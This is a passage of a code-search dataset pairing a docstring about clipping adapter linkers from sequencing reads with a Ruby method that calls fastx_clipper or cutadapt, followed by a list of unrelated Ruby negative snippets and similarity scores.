"def filter_lengths(strings, length = 5)\n words = []\n strings.each do |word|\n if word.length >= length\n words << word\n end\n end\n return words\nend"
] |
[
"0.6319621",
"0.59022206",
"0.56703275",
"0.554758",
"0.547377",
"0.5358833",
"0.52611023",
"0.52033067",
"0.5195612",
"0.518653",
"0.5154959",
"0.5139686",
"0.5112837",
"0.50397307",
"0.5037474",
"0.5036198",
"0.5016747",
"0.5008545",
"0.49940056",
"0.49842885",
"0.49832982",
"0.49808958",
"0.49791965",
"0.49628726",
"0.49442822",
"0.4941177",
"0.49001184",
"0.48954746",
"0.48761827",
"0.48705056",
"0.4849247",
"0.48469988",
"0.48469988",
"0.48469988",
"0.48372358",
"0.48231488",
"0.4818123",
"0.48066053",
"0.47907937",
"0.47860777",
"0.4777157",
"0.47711673",
"0.477102",
"0.4765164",
"0.47584304",
"0.47584304",
"0.47398606",
"0.47126696",
"0.47094092",
"0.47015947",
"0.46941352",
"0.46913075",
"0.46897507",
"0.467822",
"0.4677292",
"0.46527174",
"0.46389925",
"0.46387854",
"0.46328375",
"0.46207085",
"0.46155518",
"0.46149307",
"0.46043557",
"0.46036422",
"0.45953137",
"0.45872736",
"0.45831108",
"0.458069",
"0.4574275",
"0.45707664",
"0.45675972",
"0.45674604",
"0.4565954",
"0.45656678",
"0.45614174",
"0.45575246",
"0.45537525",
"0.45528513",
"0.45487657",
"0.45482695",
"0.45466706",
"0.45427373",
"0.45418626",
"0.45407188",
"0.45406848",
"0.45348132",
"0.45327944",
"0.45234114",
"0.45225447",
"0.45193177",
"0.45164937",
"0.45162272",
"0.4495411",
"0.4493942",
"0.44933447",
"0.44912744",
"0.4489503",
"0.44816795",
"0.44795412",
"0.44681495"
] |
0.7177229
|
0
|
Clips linker from the 3' end. linker: string to be clipped from 3'. software: clipping software (fastx, cutadapt). error_rate: allowed error rate (only for cutadapt). minlen: discard all shorter reads. Returns nothing.
|
def clip(linker, software, error_rate, minlen)
return if skip_step?(@names.get('clip'), 'clipping')
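# Both backends read the filtered reads (@names.get('filter')) and write the
# clipped output (@names.get('clip')); only cutadapt honours error_rate, and
# its report is redirected to @names.get('cliplog').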
clipper_cmd = {
fastx: \
'fastx_clipper' \
' -Q33 -c -n -v' \
" -a #{linker}" \
" -l #{minlen}" \
" #{@names.base}" \
" -i #{@names.get('filter')}" \
" -o #{@names.get('clip')}",
cutadapt: \
'cutadapt' \
" -a #{linker}" \
' --trimmed-only' \
" -e #{error_rate}" \
" -m #{minlen}" \
" -o #{@names.get('clip')}" \
" #{@names.get('filter')}" \
"> #{@names.get('cliplog')}"
}
run_cmd(clipper_cmd[software])
end
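# Illustrative call only (not part of the original source; the adapter
# sequence and threshold values below are hypothetical):
#   clip('TGGAATTCTCGGGTGCCAAGG', :cutadapt, 0.1, 18)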
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def spelling_penalty\n chars.inject_with_index(0) do |penalty, char, i| \n if i < @options[:target].size\n # add to penalty the differences between ascii values in the two strongs * the multiplier\n penalty + ((@options[:target][i] - char[0]).abs * @options[:spelling_multiplier])\n else\n penalty # evolver string is longer than the target, return penalty unchanged.\n end\n end\n end",
"def fix_unselectable_shortest(terms, prefix, original, subject)\n list = original.list.dup\n shortest = list.min{|one, two| one.length <=> two.length}\n return if shortest.nil?\n list.delete(shortest)\n\n check_pattern = completion_matcher(terms, shortest, nil, subject)\n filter = restricted_pattern(prefix)\n if list.all?{|item| check_pattern =~ item and filter !~ item }\n original.list.replace [shortest]\n end\n end",
"def RelaxNG(string_or_io, options = T.unsafe(nil)); end",
"def RelaxNG(string_or_io, options = T.unsafe(nil)); end",
"def sanitize_refpt2 refpt2\n refpt2.strip.gsub(/0[\\d]{1}\\./, \"\").gsub(\".\", \"\")\n end",
"def remove_dead_ends(minlen)\n segments.each do |s|\n c = connectivity(s)\n rm(s) if s.length < minlen and\n (c[0] == 0 or c[1] == 0) and\n !cut_segment?(s)\n end\n self\n end",
"def orig_chain_length(options = {})\n options = {\n input: si,\n output: client_interfaces[0].so,\n timeout: 1000,\n fail_on_timeout: true\n }.merge(options)\n result = nil\n preserve_scan_register_data do\n options[:input].preserve_drive_data do\n # There may be a quicker way of doing this by inspecting the netlist, but\n # that could be difficult and may need to build a lot of knowledge about the\n # circuit behavior into such an analyzer. So instead for now we will just shift\n # some known data into SI and count how long it takes to come out the other side.\n\n # Something suitably long and random\n data = '1011101101000110110001101100011010101111111100000001010110100101'.to_i(2)\n matched = false\n read_data = 0\n i = 0\n while !matched && i < (options[:timeout] + 64)\n options[:input].drive(data[i])\n shift!\n data_out = options[:output].data\n read_data >>= 1\n read_data |= data_out << 63\n read_data &= 0xFFFF_FFFF_FFFF_FFFF\n if read_data == data\n matched = true\n else\n i += 1\n end\n end\n\n if i == (options[:timeout] + 64)\n if options[:fail_on_timeout]\n fail \"The chain is either not complete, or longer than #{options[:timeout]}\"\n else\n result = nil\n end\n else\n result = i - 62\n end\n end\n end\n result\n end",
"def dangler_situation\n (@i == @len) && !valid_word?(@prefix)\n end",
"def strip_whitelisted(actual)\n initial_length = actual.length\n whitelisted = [\n '|aAccess limited to UNC Chapel Hill-authenticated users and to content added to the resource through the 2015 calendar year. After 2015, content may be added to which UNC users do not have full text access.|fUnlimited simultaneous users',\n \"|aUNC Library's One-Time Purchase of this title in 2013 gave our patrons access to the content that was available at the time of purchase. It also included all material added or updated during 2013.\"\n ]\n whitelisted.each do |okay_506|\n actual.delete(okay_506)\n end\n if initial_length > actual.length\n @has_whitelisted_506=true\n end\n return actual\n end",
"def fix!\n self.domain_length = self.domain.length \n self.domain = self.domain.ljust(32, \"\\x00\")\n end",
"def trim_requested; end",
"def overlength_penalty\n diff = query.length - reference.length\n diff = 0 if (diff < 1)\n penalty = OVERLENGTH_PENALTY * diff\n return penalty\n end",
"def strain(string)\n string = string.strip.gsub(/[#{ALWAYS_STRIP.join('')}#{@also_strip}]/, '')\n string.truncate!(@max_chars, @ellipsis) if @max_chars\n string if string.length >= @min_chars\n end",
"def sanitize_refpt1 refpt1\n refpt1.strip.gsub(\".\", \"\")\n end",
"def off_line_minimum(strArr)\n \nend",
"def display_link\n link.sub(SCHEME_PATTERN, '').truncate(48) if link\n end",
"def sequence_clip(p1 = 0, p2 = 0, ref_option = :HXB2, path_to_muscle = false)\n loc = self.locator(ref_option, path_to_muscle)\n l1 = loc[0]\n l2 = loc[1]\n if (p1 >= l1) & (p2 <= l2)\n seq = loc[4]\n ref = loc[5]\n g1 = 0\n ref.each_char do |char|\n break if l1 == p1\n g1 += 1\n l1 += 1 unless char == \"-\"\n end\n g2 = 1\n ref.reverse.each_char do |char|\n break if l2 == p2\n g2 += 1\n l2 -= 1 unless char == \"-\"\n end\n return ViralSeq::Sequence.new(self.name,seq[g1..(-g2)].tr(\"-\",\"\"))\n else\n return nil\n end\n end",
"def sanitize\n \tself.original_url.strip!\n \tself.sanitize_url = self.original_url.downcase.gsub(/(https?:\\/\\/)|(www\\.)/, \"\")\n \tself.sanitize_url = \"http://#{self.sanitize_url}\"\n\n \n start = 8\n final = self.sanitize_url.length\n\n while start <= final do\n sanitize_url[start] == ' ' ? sanitize_url[start] = '-' : sanitize_url[start] = sanitize_url[start] #change spaces for '-'\n break if sanitize_url[start] == '/' #break if '/' is found\n start +=1\n end\n\n self.sanitize_url = sanitize_url[0..start] #cut the string for creating the shortened_url\n self.short_url = sanitize_url + short_url #save the final shortened_url on the short_url's field\n end",
"def allow_short_words\n not @emphasis[:ignore_short_words]\n end",
"def short(str)\n limit = 140\n str = str.gsub(/(\\n|\\r)/, \"\")\n return str if str.size <= limit\n str.strip[0...(limit-3)]\n .concat(\"...\")\n end",
"def maskify(cc)\n # your beautiful code goes here\n \n text_length = cc.length\n \n new_text = \"\"\n last_four = cc.strip\n \n \n if text_length > 4\n loop_times = text_length-4\n loop_times.times do \n new_text.insert(0, \"#\") \n last_four.slice!(0)\n end\n elsif text_length > 0 && text_length <= 4\n last_four = cc\n else \n return \"\"\n end\n \n \n \n final = \"#{new_text}#{last_four}\"\n \n return final\n \nend",
"def skip_clean? path\n return true if path.extname == '.la' and self.class.skip_clean_paths.include? :la\n to_check = path.relative_path_from(prefix).to_s\n self.class.skip_clean_paths.include? to_check\n end",
"def trim_desc(s)\n if s && s.length > 0\n s[0..254]\n else\n s\n end\n end",
"def stopstop minsize=30\n type = \"XX\"\n orfs = []\n translate = Nucleotide::Translate.new(@trn_table)\n aa_frames = translate.aa_frames(@seq)\n num = 0\n aa_frames.each do | aa_frame |\n frame = aa_frame[:frame]\n aa = aa_frame[:sequence]\n aa_start = 0\n aa.split(/\\*/).each do | candidate |\n if candidate.size >= minsize and candidate.size > 0\n orf = ORF.new(num,type,@id,@descr,@seq,frame,aa_start*3,candidate)\n orfs.push orf\n num += 1\n end\n aa_start += candidate.size + 1\n end\n end\n orfs.sort\n end",
"def lstrip!() end",
"def maskify(cc)\n if cc.length <= 4\n return cc\n else\n pound = cc.length - 4\n masked_cc = []\n pound.times do\n masked_cc << '#'\n end\n masked_cc << cc[-4..-1]\n end\n masked_cc.join.to_s\nend",
"def remove_negations\n\n logger(\"Removing negations in #{@prefix.compact.join(\" \").to_s}\")\n\n prefix_array_reduced = @prefix.compact.join(\" \").to_s.gsub(/[\\/\\*]\\s0\\s[A-Za-z1-9]+|-\\s((([1-9][0-9]*\\.?[0-9]*)|(\\.[0-9]+)|[A-Za-z]+))\\s\\1|[\\+-\\/\\*]\\s0\\s0|[\\/\\*]\\s[A-Za-z0-9]+\\s0/,\"0\").gsub(/\\/\\s([A-Za-z1-9])\\s\\1/,\"1\")\n\n logger(\"Reduced to #{prefix_array_reduced}\")\n\n @prefix = prefix_array_reduced.split\n prefix_array_reduced = prefix_array_reduced.split.join(\" \")\n\n if !/\\/\\s([A-Za-z1-9])\\s\\1|[\\/\\*]\\s0\\s[A-Za-z1-9]+|-\\s((([1-9][0-9]*\\.?[0-9]*)|(\\.[0-9]+)|[A-Za-z]+))\\s\\2|[\\+-\\/\\*]\\s0\\s0|[\\/\\*]\\s[A-Za-z0-9]+\\s0/.match(prefix_array_reduced).nil?\n remove_negations\n else\n if !/^-\\s[\\/\\*\\+-].*0$/.match(prefix_array_reduced).nil?\n prefix_array_reduced.slice!(0..1)\n prefix_array_reduced.slice!((prefix_array_reduced.length-2)..(prefix_array_reduced.length-1))\n end\n return prefix_array_reduced\n end\n\n end",
"def filter_low_priority_errors(errors)\n list = errors.split(\"\\n\")\n list.reject! do |line|\n line.include?(\"is not approved by W3C\") ||\n line.include?('proprietary attribute \"ng-') || # AngularJS custom attributes\n line.include?(\"inserting implicit <body>\") ||\n line =~ /trimming empty <(i|em|span)>/ # Used for icons and presentation\n end\n return nil if list.size==0\n return list.join(\"\\n\")\n end",
"def maskify(cc)\n # your beautiful code goes here\n cc.length <= 4 ? cc : \"#\" * (cc.length-4) + cc[-4..-1]\nend",
"def sanitize()\n equiptment = [\"RNA-P1000\",\"RNA-P200\",\"RNA-P20\", \"Tube Block\", \"Bench Top\", \"Other\"]\n show do\n title \"Isolating RNA Effectively\"\n separator\n warning \"<b>Working with RNA can be tricky, since it is very sensitive to RNases.</b>\"\n note \"To prevent the degradation of our RNA and our hard work we must take care to use our best aseptic technique.\"\n note \"\"\n note \"\"\n check \"Wipe down area and equiptment you will be using with <b>70% EtOH</b> & <b>RNase ZAP</B>\"\n equiptment.each {|e| bullet \"<b>#{e}</b>\"}\n separator\n warning \"<b>Keep RNase ZAP on hand use whenever necessary.</b>\"\n end\n end",
"def truncate_formatted_filename f, unformatted_len, wid\n excess = unformatted_len - wid\n\n f = case @truncate_from\n\n when :right\n # FIXME: 2019-04-23 - do we need the control code at end ??\n f[0..wid - 3] + '$ '\n\n when :center\n\n # from central point calculate how much to remove in both directions\n center = unformatted_len / 2\n excess_half = excess / 2\n point = center + excess_half\n point1 = point - excess\n\n # remove text between point1 and point\n f[0..(point1 - 1)] + '$' + f[point + 2..-1] + ' '\n\n when :left\n\n # NOTE: we cannot remove the hint\n # for single hints we need to add extra space\n # there could be escape codes of varying length\n sindex = f.index(' ') || f.index('+')\n # 4 = 2 for literals, 2 to get ahead of sindex+1\n # FIXME crashing here, maybe there was a plus sign in place of space\n f[0..sindex + 0] + '<' + f[sindex + 3 + excess..-1] + ' '\n end\n return f\nend",
"def shorten( str, length = 120 )\n\tmatched = str.gsub( /\\n/, ' ' ).scan( /^.{0,#{length - 2}}/ )[0]\n\tunless $'.empty?\n\t\tmatched + '..'\n\telse\n\t\tmatched\n\tend\nend",
"def shorten\n result = url\n \n begin \n if url.size > 18 && !/http:\\/\\/snipr.com.*/.match(url)\n using(rdr = StreamReader.new(request.get_response.get_response_stream)) { \n result = rdr.read_to_end.to_s\n } \n end\n rescue Exception => e\n #catch all errors and just return the regular url\n end\n \n res = ((result.size >= url.size || result.empty?) ? url.ensure_http : result).to_s\n logger.debug(\"*** SniprUrl: Shortened url from: #{url} to #{res}\")\n res\n end",
"def trim_length\n \t400\n end",
"def ignorable!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 105 )\n\n \n # - - - - main rule block - - - -\n # at line 941:3: ( '//' (~ ( '\\\\n' | '\\\\r' ) )* ( ( '\\\\r' )? '\\\\n' )? | '/*' ( . )* '*/' | ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\\\\\' ( '\\\\r' )? '\\\\n' )+ )\n alt_44 = 3\n look_44_0 = @input.peek( 1 )\n\n if ( look_44_0 == 0x2f )\n look_44_1 = @input.peek( 2 )\n\n if ( look_44_1 == 0x2f )\n alt_44 = 1\n elsif ( look_44_1 == 0x2a )\n alt_44 = 2\n else\n raise NoViableAlternative( \"\", 44, 1 )\n end\n elsif ( look_44_0 == 0x9 || look_44_0 == 0xc || look_44_0 == 0x20 || look_44_0 == 0x5c || look_44_0 == 0xa0 )\n alt_44 = 3\n else\n raise NoViableAlternative( \"\", 44, 0 )\n end\n case alt_44\n when 1\n # at line 941:5: '//' (~ ( '\\\\n' | '\\\\r' ) )* ( ( '\\\\r' )? '\\\\n' )?\n match( \"//\" )\n # at line 941:10: (~ ( '\\\\n' | '\\\\r' ) )*\n while true # decision 38\n alt_38 = 2\n look_38_0 = @input.peek( 1 )\n\n if ( look_38_0.between?( 0x0, 0x9 ) || look_38_0.between?( 0xb, 0xc ) || look_38_0.between?( 0xe, 0xffff ) )\n alt_38 = 1\n\n end\n case alt_38\n when 1\n # at line 941:10: ~ ( '\\\\n' | '\\\\r' )\n if @input.peek( 1 ).between?( 0x0, 0x9 ) || @input.peek( 1 ).between?( 0xb, 0xc ) || @input.peek( 1 ).between?( 0xe, 0xff )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n else\n break # out of loop for decision 38\n end\n end # loop for decision 38\n # at line 941:28: ( ( '\\\\r' )? '\\\\n' )?\n alt_40 = 2\n look_40_0 = @input.peek( 1 )\n\n if ( look_40_0 == 0xa || look_40_0 == 0xd )\n alt_40 = 1\n end\n case alt_40\n when 1\n # at line 941:30: ( '\\\\r' )? '\\\\n'\n # at line 941:30: ( '\\\\r' )?\n alt_39 = 2\n look_39_0 = @input.peek( 1 )\n\n if ( look_39_0 == 0xd )\n alt_39 = 1\n end\n case alt_39\n when 1\n # at line 941:30: '\\\\r'\n match( 0xd )\n\n end\n match( 0xa )\n\n end\n\n when 2\n # at line 942:5: '/*' ( . )* '*/'\n match( \"/*\" )\n # at line 942:10: ( . )*\n while true # decision 41\n alt_41 = 2\n look_41_0 = @input.peek( 1 )\n\n if ( look_41_0 == 0x2a )\n look_41_1 = @input.peek( 2 )\n\n if ( look_41_1 == 0x2f )\n alt_41 = 2\n elsif ( look_41_1.between?( 0x0, 0x2e ) || look_41_1.between?( 0x30, 0xffff ) )\n alt_41 = 1\n\n end\n elsif ( look_41_0.between?( 0x0, 0x29 ) || look_41_0.between?( 0x2b, 0xffff ) )\n alt_41 = 1\n\n end\n case alt_41\n when 1\n # at line 942:10: .\n match_any\n\n else\n break # out of loop for decision 41\n end\n end # loop for decision 41\n match( \"*/\" )\n\n when 3\n # at line 943:5: ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\\\\\' ( '\\\\r' )? '\\\\n' )+\n # at file 943:5: ( '\\\\t' | '\\\\f' | ' ' | '\\\\u00A0' | '\\\\\\\\' ( '\\\\r' )? '\\\\n' )+\n match_count_43 = 0\n while true\n alt_43 = 6\n case look_43 = @input.peek( 1 )\n when 0x9 then alt_43 = 1\n when 0xc then alt_43 = 2\n when 0x20 then alt_43 = 3\n when 0xa0 then alt_43 = 4\n when 0x5c then alt_43 = 5\n end\n case alt_43\n when 1\n # at line 943:7: '\\\\t'\n match( 0x9 )\n\n when 2\n # at line 943:14: '\\\\f'\n match( 0xc )\n\n when 3\n # at line 943:21: ' '\n match( 0x20 )\n\n when 4\n # at line 943:27: '\\\\u00A0'\n match( 0xa0 )\n\n when 5\n # at line 943:38: '\\\\\\\\' ( '\\\\r' )? 
'\\\\n'\n match( 0x5c )\n # at line 943:43: ( '\\\\r' )?\n alt_42 = 2\n look_42_0 = @input.peek( 1 )\n\n if ( look_42_0 == 0xd )\n alt_42 = 1\n end\n case alt_42\n when 1\n # at line 943:43: '\\\\r'\n match( 0xd )\n\n end\n match( 0xa )\n\n else\n match_count_43 > 0 and break\n eee = EarlyExit(43)\n\n\n raise eee\n end\n match_count_43 += 1\n end\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 105 )\n\n end",
"def cutinfo(string)\n inf=/\\024/=~string1\n inf=inf+2\n trans=string1[inf..-1]\nend",
"def link_sanitizer=(_arg0); end",
"def link_sanitizer=(_arg0); end",
"def link_sanitizer=(_arg0); end",
"def long_str # :nodoc:\n long ? Utils.prefix_long(long, '[no-]') : ''\n end",
"def shorten(len=20)\n self[0..len-1]\n end",
"def if_dangler_situation\n if(@i == @len) && !valid_word?(@prefix)\n @last_word_index = @words.keys.sort.last\n @words.delete(@last_word_index)\n end\n end",
"def truncate_legend_label(label)\n truncated_label = label.to_s\n while calculate_width(scale_fontsize(@legend_font_size), truncated_label) > (@columns - @legend_left_margin - Gruff::Base::RIGHT_MARGIN) && (truncated_label.length > 1)\n truncated_label = truncated_label[0..truncated_label.length-2]\n end\n truncated_label + (truncated_label.length < label.to_s.length ? \"…\" : '')\n end",
"def ltrunc(max)\n if length > max\n sub(/^.*?(.{#{max - 3}})$/, '...\\1')\n else\n self\n end\n end",
"def skip_known_failures(passphrase)\n passphrase.gsub(/[iol].+$/) { |m| m.chars.first.next + ('a' * m[1..-1].size) }\n end",
"def relax\n # Sometimes a farmer wants to relax. In doing so, you will get a chance to enjoy the beauty of each one of your fields (without harvesting them).\n Crop.relax\n end",
"def strip_wild_card_alts(disabled_alts)\n sorted_disable_alts = ArrayList.new(disabled_alts)\n Collections.sort(sorted_disable_alts)\n last_alt = sorted_disable_alts.get(sorted_disable_alts.size - 1)\n block_ast = @dfa.attr_nfa.attr_grammar.get_decision_block_ast(@dfa.attr_decision_number)\n # System.out.println(\"block with error = \"+blockAST.toStringTree());\n last_alt_ast = nil\n if ((block_ast.get_child(0).get_type).equal?(ANTLRParser::OPTIONS))\n # if options, skip first child: ( options { ( = greedy false ) )\n last_alt_ast = block_ast.get_child(last_alt.int_value)\n else\n last_alt_ast = block_ast.get_child(last_alt.int_value - 1)\n end\n # System.out.println(\"last alt is \"+lastAltAST.toStringTree());\n # if last alt looks like ( ALT . <end-of-alt> ) then wildcard\n # Avoid looking at optional blocks etc... that have last alt\n # as the EOB:\n # ( BLOCK ( ALT 'else' statement <end-of-alt> ) <end-of-block> )\n if (!(last_alt_ast.get_type).equal?(ANTLRParser::EOB) && (last_alt_ast.get_child(0).get_type).equal?(ANTLRParser::WILDCARD) && (last_alt_ast.get_child(1).get_type).equal?(ANTLRParser::EOA))\n # System.out.println(\"wildcard\");\n disabled_alts.remove(last_alt)\n end\n end",
"def run_line_length_cop; end",
"def truncate_on_word_boundary(str, min_len, max_len, spillover_if_necessary=false, start_offset=0, add_trailer=true)\n return \"\" if blank(str)\n more_url_link = yield if block_given?\n s = truncate(str, min_len, max_len, true, start_offset, add_trailer, more_url_link)\n return s if !s.nil?\n\n ## What to do if we fail?\n if s.nil? && spillover_if_necessary\n i = str[start_offset+max_len..str.length].index(@@separators)\n return str if i.nil?\n\n retval = str[start_offset..start_offset+max_len+i-1]\n retval += \"...\" if add_trailer\n retval += \" #{more_url_link}\" unless blank(more_url_link)\n return retval\n else\n return nil ## Return nil so that the user knows that this is an exceptional condition and handles it appropriately\n end\n end",
"def lex_ignore(length)\n \n return if length.eql?0 #Si no hay nada regresa\n\n word = @input[0..length-1] # Se crea un aux de lo que se quiere ignorar\n lineas = (word + ' ').lines.to_a.length.pred #Se saca el numero de lineas, \n #convirtiendo en arreglo de las palabras separadas \\n y midiendolo\n @line += lineas\n @input = @input[length..@input.length] # Se omite la solicitado\n\n if lineas.eql?0 then\n @column += length #Se suma las columnas omitidas a las que habia\n else\n @column = 1 #Sino se colocan en 1 por salto de linea\n end\n end",
"def prune_string(string)\n string.chomp.slice(0..pruned_width)\n end",
"def alternatives_for_invalids\n return [4] if lines[0] == ' ' && lines[1] == '|_|' && lines[2] == ' '\n\n return [4] if lines[0] == ' ' && lines[1] == '|_ ' && lines[2] == ' |'\n\n return [4] if lines[0] == ' ' && lines[1] == '| |' && lines[2] == ' |'\n\n return [4] if lines[0] == ' ' && lines[1] == ' _|' && lines[2] == ' |'\n\n return [4] if lines[0] == ' |' && lines[1] == '|_|' && lines[2] == ' |'\n\n []\n end",
"def combine_cc_and_dl(documents)\n if documents.has_key?(\"has_driving_license\") && documents.has_key?(\"has_credit_card\") && documents.size < 4\n documents.delete(\"has_driving_license\")\n documents.delete(\"has_credit_card\")\n documents[\"has_driving_license_and_credit_card\"] = false\n end\n end",
"def clean_an\n if aleph_record?\n an_numeric_component.prepend('MIT01')\n elsif aleph_cr_record?\n an_numeric_component.prepend('MIT30')\n end\n end",
"def adjust(s)\n [s.length, @nShields].min\n end",
"def find_truncated_sequence(uri, sorted_sequences, target_length)\n sorted_sequences.find do |seq|\n (uri.special_format.length - seq.length + SEPARATOR.length) <= target_length\n end\n end",
"def droppre s\n if s.select{|i|i=~/^# *!intermediate/}.size>0\n flag=false\n s.map{|i|\n i=~/^# *!intermediate/\n flag=true if $&\n flag ? i : nil\n }-[nil]\n else\n s\n end\n end",
"def marc_lcc_to_broad_category( options = {}, spec=\"050a:060a:090a:096a\")\n # Trying to match things that look like LCC, and not match things\n # that don't. Is tricky.\n lcc_regex = LCC_REGEX\n default_value = options.has_key?(:default) ? options[:default] : \"Unknown\"\n translation_map = Traject::TranslationMap.new(\"lcc_top_level\")\n\n extractor = MarcExtractor.new(spec, :separator => nil)\n\n lambda do |record, accumulator|\n candidates = extractor.extract(record)\n\n candidates.reject! do |candidate|\n !(lcc_regex.match candidate)\n end\n\n accumulator.concat translation_map.translate_array!(candidates.collect {|a| a.lstrip.slice(0, 1)}).uniq\n\n if default_value && accumulator.empty?\n accumulator << default_value\n end\n end\n end",
"def limit(length)\n (self.length > length)? self[0...length].gsub(/(?![\\s\\S]+?[,:;)\\/\\\\\\|])([,:;)\\/\\\\\\|].*)/,'') : self\n end",
"def fix_train_availables(tlist)\n phase_list = %w[1 2 3]\n phase_list << '3a' if @units[2] && !@kits[3]\n phase_list.concat(%w[4 4a]) if @kits[3]\n tlist.each do |h|\n h.delete(:available_on) if h[:available_on] && !phase_list.include?(h[:available_on])\n end\n end",
"def remove_non_amino_acids(sequence)\n sequence.gsub(Nonstandard_AA_re, '')\n end",
"def filter(minlen)\n return if skip_step?(@names.get('filter'), 'filtering')\n\n # Only filter input files from Illumina CASAVA 1.8 pipeline\n if `head -n 1 #{@names.get('reads')} | cut -d ' ' -f 3`.empty?\n run_cmd(\n 'fastq_illumina_filter' \\\n \" --keep N -v -l #{minlen} \" \\\n \" -o #{@names.get('filter')}\" \\\n \" #{@names.get('reads')}\"\n )\n else\n @names.set('filter', '.fastq')\n end\n end",
"def maskify(cc)\n cc.size < 5 ? cc : cc[-4..-1].rjust(cc.size, '#')\nend",
"def cleanup!(max_len)\n if self.length >= max_len\n self.clear\n end\n end",
"def repair(text); end",
"def potential_rule(line)\n line =~ /\\s@(rx|dfa) / && # Has a regexp\n line !~ /\\bfast:/ && # Does not already have an fast\n line !~ /\\st:/ && # Does not have a transformation\n line =~ FIELD_RE # Involves a field fast knows about.\nend",
"def directive_line!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 107 )\n\n \n # - - - - main rule block - - - -\n # at line 956:5: ( IGNORABLE )* ( HIDE | REQUIRE ) ( IGNORABLE )* ( ( '\\\\r' )? '\\\\n' )?\n # at line 956:5: ( IGNORABLE )*\n while true # decision 51\n alt_51 = 2\n look_51_0 = @input.peek( 1 )\n\n if ( look_51_0 == 0x9 || look_51_0 == 0xc || look_51_0 == 0x20 || look_51_0 == 0x2f || look_51_0 == 0x5c || look_51_0 == 0xa0 )\n alt_51 = 1\n\n end\n case alt_51\n when 1\n # at line 956:5: IGNORABLE\n ignorable!\n\n else\n break # out of loop for decision 51\n end\n end # loop for decision 51\n # at line 957:5: ( HIDE | REQUIRE )\n alt_52 = 2\n look_52_0 = @input.peek( 1 )\n\n if ( look_52_0 == 0x68 )\n alt_52 = 1\n elsif ( look_52_0 == 0x69 || look_52_0 == 0x72 )\n alt_52 = 2\n else\n raise NoViableAlternative( \"\", 52, 0 )\n end\n case alt_52\n when 1\n # at line 957:7: HIDE\n hide!\n\n when 2\n # at line 958:7: REQUIRE\n require!\n\n end\n # at line 960:5: ( IGNORABLE )*\n while true # decision 53\n alt_53 = 2\n look_53_0 = @input.peek( 1 )\n\n if ( look_53_0 == 0x9 || look_53_0 == 0xc || look_53_0 == 0x20 || look_53_0 == 0x2f || look_53_0 == 0x5c || look_53_0 == 0xa0 )\n alt_53 = 1\n\n end\n case alt_53\n when 1\n # at line 960:5: IGNORABLE\n ignorable!\n\n else\n break # out of loop for decision 53\n end\n end # loop for decision 53\n # at line 961:5: ( ( '\\\\r' )? '\\\\n' )?\n alt_55 = 2\n look_55_0 = @input.peek( 1 )\n\n if ( look_55_0 == 0xa || look_55_0 == 0xd )\n alt_55 = 1\n end\n case alt_55\n when 1\n # at line 961:7: ( '\\\\r' )? '\\\\n'\n # at line 961:7: ( '\\\\r' )?\n alt_54 = 2\n look_54_0 = @input.peek( 1 )\n\n if ( look_54_0 == 0xd )\n alt_54 = 1\n end\n case alt_54\n when 1\n # at line 961:7: '\\\\r'\n match( 0xd )\n\n end\n match( 0xa )\n\n end\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 107 )\n\n end",
"def sanitizeBusstop\n [@busstop, @endstop].each do |stop|\n stop = stop.split(/[ \\/]/)\n stop.delete(\"Metro\")\n stop.delete(\"Inbound\")\n stop.delete(\"Outbound\")\n stop = stop.join(\" \")\n end\n end",
"def create_bad_scans_skip\n @index = self.short_description.index(\"skip ip\")\n @result = self.short_description[@index + 1, 22]\n @string = @result.gsub(/[skip:,]/,' ')\n @array = @string.split(/\\s*/)\n @skip_number = \"\"\n @array.each do |char|\n if(char==\"\")\n @skip_number.concat(\"\")\n elsif(char==\":\")\n @skip_number.concat(\"\")\n elsif(char==\",\")\n @skip_number.concat(\"\")\n else\n @skip_number.concat(char)\n end\n end\n self.skip = @skip_number.strip()\nend",
"def make_syllable\n structure = self.structure.chars\n\n while true\n syll = ''\n structure.each do |ptype|\n # If the char is '?', skip with 50% chance to remove last character\n # (think RegEx usage of '?')\n if ptype == '?'\n if rand < 0.5\n syll = syll[0...syll.length - 1]\n end\n next\n end\n\n syll << choose(self.phonemes[ptype], self.exponent)\n end\n\n # Make sure this syllable doesn't violate a restriction\n bad = false\n self.restricts.each do |regex|\n if /#{regex}/ =~ syll\n bad = true\n break\n end\n end\n next if bad\n\n return spell(syll)\n end\n end",
"def maskify(cc)\n return cc.length <= 4 ? cc : ('#' * (cc.length-4)) + cc[cc.length-4..cc.length-1]\nend",
"def link_to_ird_strains!(noisy = false)\n cutoff_year = Time.now.year % 100\n \n parts = strain_name.split(/\\//)\n part_synonyms = parts.each_with_index.map do |part, i|\n part.gsub! /^\\s+|\\s+$/, ''\n synonyms = case\n when i == 0\n # First part, the type of the influenza virus, we'll leave alone\n [part]\n when (i == parts.size - 1 and part =~ /^(\\d{2}?)(\\d{2})$/)\n # Try two digit AND four digit date, assuming that two digit dates past this year's are in the 1900's\n if $1.size > 0 then [part, $2] else [part, \"#{$2.to_i > cutoff_year ? 19 : 20}#{$2}\"] end\n when part =~ /^0*(\\d+)$/\n # Allow some flexibility in leading zeros for middle segments containing numbers\n [$1, \"0#{$1}\", \"00#{$1}\", \"000#{$1}\"]\n when synonym_dict[part]\n synonym_dict[part].to_a\n else\n [part]\n end\n # Now add more possibilities: hyphens removed, underscores vs. spaces\n synonyms.map do |syn|\n more_syns = [syn]\n more_syns << syn.gsub(/-/, '') if syn =~ /-/\n more_syns << syn.gsub(/ /, '_') if syn =~ /_/\n more_syns << syn.gsub(/_/, ' ') if syn =~ / /\n more_syns\n end.flatten\n end\n \n part_synonyms.first.product(*part_synonyms.drop(1)).each do |parts|\n name = parts.join('/').gsub('_', '\\\\_').gsub('%', '\\\\%')\n IrdStrain.where(\"strain_name LIKE ?\", name).find_each do |ird_strain|\n puts \"#{strain_name} linked to IRD strain #{ird_strain.id}, name #{ird_strain.strain_name}.\" if noisy\n ird_strains << ird_strain unless ird_strains.include? ird_strain\n end\n end\n \n ird_strains.size > 0\n end",
